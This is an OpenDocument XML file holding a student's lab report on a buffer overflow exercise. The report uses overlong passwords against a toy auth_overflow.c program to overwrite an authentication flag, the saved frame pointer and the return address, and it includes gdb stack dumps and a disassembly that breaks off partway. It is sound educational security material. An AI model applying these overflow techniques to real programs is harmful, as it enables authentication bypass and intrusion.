
<file path=META-INF/manifest.xml><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE manifest
  PUBLIC '-//OpenOffice.org//DTD Manifest 1.0//EN'
  'Manifest.dtd'>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0">
  <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text" manifest:full-path="/"/>
  <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="content.xml"/>
  <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="styles.xml"/>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office:version="1.0">
  <office:font-face-decls>
    <style:font-face style:name="Times" svg:font-family="Times"/>
  </office:font-face-decls>
  <office:automatic-styles>
    <style:style style:name="Table1" style:family="table">
      <style:table-properties style:width="7.0in" table:align="margins"/>
    </style:style>
    <style:style style:name="P1" style:family="paragraph" style:parent-style-name="Standard">
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.5000in" fo:text-indent="-0.5000in">
        <style:tab-stops>
          <style:tab-stop style:position="0.1528in"/>
          <style:tab-stop style:position="0.5000in"/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="1.0000in" fo:text-indent="-1.0000in">
        <style:tab-stops>
          <style:tab-stop style:position="0.6528in"/>
          <style:tab-stop style:position="1.0000in"/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="1.5000in" fo:text-indent="-1.5000in">
        <style:tab-stops>
          <style:tab-stop style:position="1.1528in"/>
          <style:tab-stop style:position="1.5000in"/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="1.5000in"/>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P6" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="2.0000in" fo:text-indent="-2.0000in">
        <style:tab-stops>
          <style:tab-stop style:position="1.6528in"/>
          <style:tab-stop style:position="2.0000in"/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P7" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.2500in"/>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-bottom="0.1111in" fo:line-height="102%"/>
      <style:text-properties style:font-name="Times" fo:font-size="12.0pt"/>
    </style:style>
    <style:style style:name="T1" style:family="text">
      <style:text-properties fo:letter-spacing="0.0000in"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties fo:font-weight="bold" fo:font-weight-asian="bold" fo:font-weight-complex="bold" style:text-underline-style="solid" fo:letter-spacing="0.0000in"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties fo:font-style="italic" fo:font-style-asian="italic" fo:font-style-complex="italic" fo:letter-spacing="0.0000in"/>
    </style:style>
    <style:style style:name="T4" style:family="text">
      <style:text-properties style:text-position="super 100%" fo:letter-spacing="0.0000in"/>
    </style:style>
    <style:style style:name="T5" style:family="text">
      <style:text-properties fo:font-weight="bold" fo:font-weight-asian="bold" fo:font-weight-complex="bold" fo:letter-spacing="0.0000in"/>
    </style:style>
    <style:style style:name="T6" style:family="text">
      <style:text-properties style:text-underline-style="solid" fo:letter-spacing="0.0000in" fo:color="#0000ff"/>
    </style:style>
    <style:style style:name="TableColumn1" style:family="table-column">
      <style:table-column-properties style:column-width="3.4625in" style:rel-column-width="32767*"/>
    </style:style>
    <style:style style:name="TableCell1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.0382in"/>
    </style:style>
    <text:list-style style:name="L1">
      <text:list-level-style-bullet text:level="1" text:bullet-char="">
        <style:list-level-properties text:space-before="0.25in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="2" text:bullet-char="o">
        <style:list-level-properties text:space-before="0.50in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="3" text:bullet-char="">
        <style:list-level-properties text:space-before="0.75in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
    </text:list-style>
    <text:list-style style:name="L2">
      <text:list-level-style-bullet text:level="1" text:bullet-char="">
        <style:list-level-properties text:space-before="0.25in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="2" text:bullet-char="o">
        <style:list-level-properties text:space-before="0.50in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="3" text:bullet-char="">
        <style:list-level-properties text:space-before="0.75in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="4" text:bullet-char="">
        <style:list-level-properties text:space-before="1.00in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
    </text:list-style>
    <text:list-style style:name="L3">
      <text:list-level-style-bullet text:level="1" text:bullet-char="">
        <style:list-level-properties text:space-before="0.25in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="2" text:bullet-char="o">
        <style:list-level-properties text:space-before="0.50in" text:min-label-width="0.25in"/>
      </text:list-level-style-bullet>
    </text:list-style>
  </office:automatic-styles>
  <office:body>
    <office:text>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T2">Project 9 – Buffer Overflow Part 2</text:span>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1">This project follows the outline of “Stack Smashing Tutorial” given on the course website. I spent well over 3 hours on this (upwards into 8 or 10 hours examining the stack, learning perl, watching video tutorials about the structure of the stack, and doing the assignment, and I feel this document shows an accurate description of what I learned).</text:span>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1">Part A:</text:span>
      </text:p>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P2">
            <text:span text:style-name="T1">Gaining access without a valid password:</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">I was able to get the “Access Granted” message by using any string of at least length 17 characters to overflow the buffer allocated for the string in the </text:span>
                <text:span text:style-name="T3">check_authentication</text:span>
                <text:span text:style-name="T1">
                  <text:s/>
                  function, which is only 16 large. For example, the password “mypasswordhelloyo” was accepted as the correct password into the program, while the similar password “mypasswordhelloy” (one character shorter) was rejected as invalid.
                </text:span>
              </text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Stack analysis:</text:span>
              </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">After doing the unsafe </text:span>
                    <text:span text:style-name="T3">strcpy</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      function in line 9 of 
                    </text:span>
                    <text:span text:style-name="T3">auth_overflow.c</text:span>
                    <text:span text:style-name="T1">, the status of the stack is as shown in the figure below (with labels of the locations directly above the memory location).</text:span>
                  </text:p>
                </text:list-item>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">I am able to gain access because the local variable </text:span>
                    <text:span text:style-name="T3">auth­_flag</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      is overwritten by the value of the parameter 
                    </text:span>
                    <text:span text:style-name="T3">password</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      when 
                    </text:span>
                    <text:span text:style-name="T3">strcpy</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      is called. When 
                    </text:span>
                    <text:span text:style-name="T3">check authentication</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                    </text:span>
                    <text:span text:style-name="T3">_</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      is first called, the sequence “push %ebp; mov %esp,%ebp; sub $0x38,%esp” is made, creating a certain number of bytes available for the local variables to be filled by later parts of the routine. By making the parameter 
                    </text:span>
                    <text:span text:style-name="T3">password</text:span>
                    <text:span text:style-name="T1">’s value larger than 16 bytes, the 17</text:span>
                    <text:span text:style-name="T4">th</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      byte overflows the 
                    </text:span>
                    <text:span text:style-name="T3">password_buffer</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      variable into 
                    </text:span>
                    <text:span text:style-name="T3">auth_flag</text:span>
                    <text:span text:style-name="T1">’s memory area, overwriting the previous contents of zero set in line 6. </text:span>
                  </text:p>
                </text:list-item>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">The way the stack works is what makes this attack work: It is laid out like the general following diagram:</text:span>
                  </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">
          bottom_of_memory
          <text:tab/>
          (top of stack)
        </text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[localvari]</text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[localvari]</text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">
          [stackfram]
          <text:tab/>
          <text:tab/>
          <text:tab/>
          (local frame pointer (%ebp))
        </text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[returnadd]</text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[parameter]</text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">
          top_of_memory
          <text:tab/>
          <text:tab/>
          (bottom of stack)
        </text:span>
      </text:p>
      <text:list text:style-name="L2">
        <text:list-item>
          <text:list>
            <text:list-item>
              <text:list>
                <text:list-item>
                  <text:list>
                    <text:list-item>
                      <text:p text:style-name="P6">
                        -
                        <text:span text:style-name="T1">That is, when a function like </text:span>
                        <text:span text:style-name="T3">check_authentication </text:span>
                        <text:span text:style-name="T1">
                          <text:s/>
                          is called, the parameters are pushed onto the stack, followed by the return address (the address of the next instruction, which is also labeled below in the diagram of the real stack in this program), the base pointer (to point to the start of the frame for later use, which also allows the stack pointer to be freed up and used appropriately), and finally the local variables. By pushing the variables onto the stack as they are encountered, 
                        </text:span>
                        <text:span text:style-name="T3">auth_flag </text:span>
                        <text:span text:style-name="T1">is put on first, followed by </text:span>
                        <text:span text:style-name="T3">password_buffer</text:span>
                        <text:span text:style-name="T1">
                          <text:s/>
                          (so 
                        </text:span>
                        <text:span text:style-name="T3">password_buffer</text:span>
                        <text:span text:style-name="T1">
                          <text:s/>
                          has the lower address and is on top of the stack). By writing to that variable’s memory location, we can overflow it and enter higher memory overwriting that content.
                        </text:span>
                      </text:p>
                    </text:list-item>
                  </text:list>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <table:table table:name="Table1" table:style-name="Table1">
        <table:table-column table:style-name="TableColumn1"/>
        <table:table-row>
          <table:table-cell table:style-name="TableCell1">
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:tab/>
                <text:s text:c="8"/>
                ---esp---
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2c0: 0x08048295
                <text:tab/>
                0x41caf8f8
                <text:tab/>
                0xbfebfbff
                <text:tab/>
                0x41ce3e63
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:tab/>
                <text:tab/>
                <text:s text:c="45"/>
                --password_buffer—
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="64"/>
                A P Y M
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2d0:
                <text:tab/>
                0xffffffff
                <text:tab/>
                0xffffd30c
                <text:tab/>
                0x41cbeb6c
                <text:tab/>
                0x6170796d
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:tab/>
                <text:tab/>
                -------------password_buffer-------------- --localvar(auth_flag)—
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="15"/>
                O W S S 
                <text:s text:c="8"/>
                E H D R 
                <text:s text:c="8"/>
                Y O L L 
                <text:s text:c="15"/>
                O
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2e0:
                <text:tab/>
                0x6f777373
                <text:tab/>
                0x65686472
                <text:tab/>
                0x796f6c6c
                <text:tab/>
                0x0000006f
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:tab/>
                <text:tab/>
                <text:tab/>
                <text:tab/>
                <text:tab/>
                <text:s text:c="8"/>
                ---ebp--- 
                <text:s text:c="4"/>
                --return-addr--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2f0: 0x00000002 
                <text:s text:c="5"/>
                0xffffd3b4
                <text:tab/>
                0xffffd318
                <text:tab/>
                0x08048580
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="9"/>
                --password(param)--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd300:
                <text:tab/>
                0xffffd579 
                <text:s text:c="5"/>
                0x0000002f
                <text:tab/>
                0x080485cb
                <text:tab/>
                0x41e6d000
              </text:span>
            </text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P2">
            -
            <text:span text:style-name="T1">Gaining access without a valid password, then the program crashes:</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">The program grants access but then segmentation faults when it receives “mypasswordhelloyothisisveryl”, which has 28 characters.</text:span>
              </text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Stack Analysis:</text:span>
              </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">Here, the 28 character inputted password is 12 characters (bytes) over what the </text:span>
                    <text:span text:style-name="T3">password_buffer</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      is meant to hold, therefore overflowing 12 bytes into higher memory addresses. For example, this time the stack pointer (%esp) is located at 0xffffd2b0, the location of 
                    </text:span>
                    <text:span text:style-name="T3">password_buffer </text:span>
                    <text:span text:style-name="T1">is 0xffffd2cc, the location of </text:span>
                    <text:span text:style-name="T3">auth­_flag</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      is 0xffffd2dc. See the diagram below:
                    </text:span>
                  </text:p>
                </text:list-item>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">By using input of this length, it changed the value of %ebp, which is used in instructions for located the location of local variables in addition to restoring the correct value of the %eax, among other things, and you cause the eventual seg fault by corrupting it.</text:span>
                  </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <table:table table:name="Table2" table:style-name="Table1">
        <table:table-column table:style-name="TableColumn1"/>
        <table:table-row>
          <table:table-cell table:style-name="TableCell1">
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="17"/>
                --esp--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2b0: 
                <text:s text:c="4"/>
                0xffffd2cc 
                <text:s text:c="5"/>
                0xffffd56e 
                <text:s text:c="5"/>
                0xbfebfbff 
                <text:s text:c="5"/>
                0x41ce3e63
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="60"/>
                --password_buffer--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2c0: 
                <text:s text:c="4"/>
                0xffffffff 
                <text:s text:c="5"/>
                0xffffd2fc 
                <text:s text:c="5"/>
                0x41cbeb6c 
                <text:s text:c="5"/>
                0x6170796d
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="15"/>
                -------------password_buffer----------------- 
                <text:s/>
                ---auth_flag--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2d0: 
                <text:s text:c="4"/>
                0x6f777373 
                <text:s text:c="5"/>
                0x65686472 
                <text:s text:c="5"/>
                0x796f6c6c 
                <text:s text:c="5"/>
                0x6968746f
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1"/>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="29"/>
              </text:span>
              <text:span text:style-name="T5">--ebp(changed from 0xffffd308)--</text:span>
              <text:span text:style-name="T1">
                <text:s/>
                --&amp;return_addr--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2e0: 
                <text:s text:c="4"/>
                0x76736973 
                <text:s text:c="5"/>
                0x6c797265 
                <text:s text:c="5"/>
              </text:span>
              <text:span text:style-name="T5">0xffffd300 </text:span>
              <text:span text:style-name="T1">
                <text:s text:c="5"/>
                0x08048580
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="15"/>
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                <text:s text:c="14"/>
                --&amp;password--
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd2f0: 
                <text:s text:c="4"/>
                0xffffd56e 
                <text:s text:c="5"/>
                0x0000002f 
                <text:s text:c="5"/>
                0x080485cb 
                <text:s text:c="5"/>
                0x41e6d000
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd300: 
                <text:s text:c="4"/>
                0x080485c0 
                <text:s text:c="5"/>
                0x00000000 
                <text:s text:c="5"/>
                0x00000000 
                <text:s text:c="5"/>
                0x41ccb963
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd310: 
                <text:s text:c="4"/>
                0x00000002 
                <text:s text:c="5"/>
                0xffffd3a4 
                <text:s text:c="5"/>
                0xffffd3b0 
                <text:s text:c="5"/>
                0xf7ffc6b0
              </text:span>
            </text:p>
            <text:p text:style-name="P7">
              <text:span text:style-name="T1">
                0xffffd320: 
                <text:s text:c="4"/>
                0x00000001 
                <text:s text:c="5"/>
                0x00000001 
                <text:s text:c="5"/>
                0x00000000 
                <text:s text:c="5"/>
                0x0804a024
              </text:span>
            </text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P7">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P2">
            - 
            <text:span text:style-name="T1">Program crashing without gaining access:</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">The program crashes without granting access with the password input “mypasswordhelloyothisisverylonga”, which has 32 characters.</text:span>
              </text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Stack Analysis:</text:span>
              </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">The change that causes this to crash without gaining access is due to this password input being just long enough to overwrite the value in the memory address storing the return address. The 16 bytes of stack at location 0xffffd2e0 go from “0x00000002 0xffffd3a4 0xffffd308 </text:span>
                    <text:span text:style-name="T5">0x08048580</text:span>
                    <text:span text:style-name="T1">” to “0x76736973 0x6c797265 0x61676e6f </text:span>
                    <text:span text:style-name="T5">0x08048500</text:span>
                    <text:span text:style-name="T1">”. The bolded 4 bytes store the return address, which is corrupted causing the program crash.</text:span>
                  </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P8">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1">Part 2:</text:span>
      </text:p>
      <text:list text:style-name="L3">
        <text:list-item>
          <text:p text:style-name="P2">
            -
            <text:span text:style-name="T1">Gaining access without a valid password by overwriting the return value on the stack</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">This is the disassembly of ‘main’:</text:span>
              </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <table:table table:name="Table3" table:style-name="Table1">
        <table:table-column table:style-name="TableColumn1"/>
        <table:table-row>
          <table:table-cell table:style-name="TableCell1">
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">(gdb) disas main</text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">Dump of assembler code for function main:</text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804853b &lt;+0&gt;: 
                <text:s text:c="4"/>
                push 
                <text:s text:c="2"/>
                %ebp
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804853c &lt;+1&gt;: 
                <text:s text:c="4"/>
                mov 
                <text:s text:c="3"/>
                %esp,%ebp
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804853e &lt;+3&gt;: 
                <text:s text:c="4"/>
                and 
                <text:s text:c="3"/>
                $0xfffffff0,%esp
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048541 &lt;+6&gt;: 
                <text:s text:c="4"/>
                sub 
                <text:s text:c="3"/>
                $0x10,%esp
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048544 &lt;+9&gt;: 
                <text:s text:c="4"/>
                cmpl 
                <text:s text:c="2"/>
                $0x1,0x8(%ebp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048548 &lt;+13&gt;: 
                <text:s text:c="3"/>
                jg 
                <text:s text:c="4"/>
                0x804856b &lt;main+48&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804854a &lt;+15&gt;: 
                <text:s text:c="3"/>
                mov 
                <text:s text:c="3"/>
                0xc(%ebp),%eax
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804854d &lt;+18&gt;: 
                <text:s text:c="3"/>
                mov 
                <text:s text:c="3"/>
                (%eax),%eax
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804854f &lt;+20&gt;: 
                <text:s text:c="3"/>
                mov 
                <text:s text:c="3"/>
                %eax,0x4(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048553 &lt;+24&gt;: 
                <text:s text:c="3"/>
                movl 
                <text:s text:c="2"/>
                $0x8048665,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804855a &lt;+31&gt;: 
                <text:s text:c="3"/>
                call 
                <text:s text:c="2"/>
                0x8048380 &lt;printf@plt&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804855f &lt;+36&gt;: 
                <text:s text:c="3"/>
                movl 
                <text:s text:c="2"/>
                $0x0,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048566 &lt;+43&gt;: 
                <text:s text:c="3"/>
                call 
                <text:s text:c="2"/>
                0x80483c0 &lt;exit@plt&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804856b &lt;+48&gt;: 
                <text:s text:c="3"/>
                mov 
                <text:s text:c="3"/>
                0xc(%ebp),%eax
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804856e &lt;+51&gt;: 
                <text:s text:c="3"/>
                add 
                <text:s text:c="3"/>
                $0x4,%eax
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048571 &lt;+54&gt;: 
                <text:s text:c="3"/>
                mov 
                <text:s text:c="3"/>
                (%eax),%eax
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048573 &lt;+56&gt;: 
                <text:s text:c="3"/>
                mov 
                <text:s text:c="3"/>
                %eax,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048576 &lt;+59&gt;: 
                <text:s text:c="3"/>
                call 
                <text:s text:c="2"/>
                0x80484e0 &lt;check_authentication&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
              </text:span>
              <text:span text:style-name="T5">
                0x0804857b &lt;+64&gt;: 
                <text:s text:c="3"/>
                test 
                <text:s text:c="2"/>
                %eax,%eax
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804857d &lt;+66&gt;: 
                <text:s text:c="3"/>
                je 
                <text:s text:c="4"/>
                0x80485a5 &lt;main+106&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
              </text:span>
              <text:span text:style-name="T5">
                0x0804857f &lt;+68&gt;: 
                <text:s text:c="3"/>
                movl 
                <text:s text:c="2"/>
                $0x804867b,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048586 &lt;+75&gt;: 
                <text:s text:c="3"/>
                call 
                <text:s text:c="2"/>
                0x80483a0 &lt;puts@plt&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804858b &lt;+80&gt;: 
                <text:s text:c="3"/>
                movl 
                <text:s text:c="2"/>
                $0x8048698,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048592 &lt;+87&gt;: 
                <text:s text:c="3"/>
                call 
                <text:s text:c="2"/>
                0x80483a0 &lt;puts@plt&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x08048597 &lt;+92&gt;: 
                <text:s text:c="3"/>
                movl 
                <text:s text:c="2"/>
                $0x80486ae,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x0804859e &lt;+99&gt;: 
                <text:s text:c="3"/>
                call 
                <text:s text:c="2"/>
                0x80483a0 &lt;puts@plt&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x080485a3 &lt;+104&gt;: 
                <text:s text:c="2"/>
                jmp 
                <text:s text:c="3"/>
                0x80485b1 &lt;main+118&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x080485a5 &lt;+106&gt;: 
                <text:s text:c="2"/>
                movl 
                <text:s text:c="2"/>
                $0x80486ca,(%esp)
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x080485ac &lt;+113&gt;: 
                <text:s text:c="2"/>
                call 
                <text:s text:c="2"/>
                0x80483a0 &lt;puts@plt&gt;
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
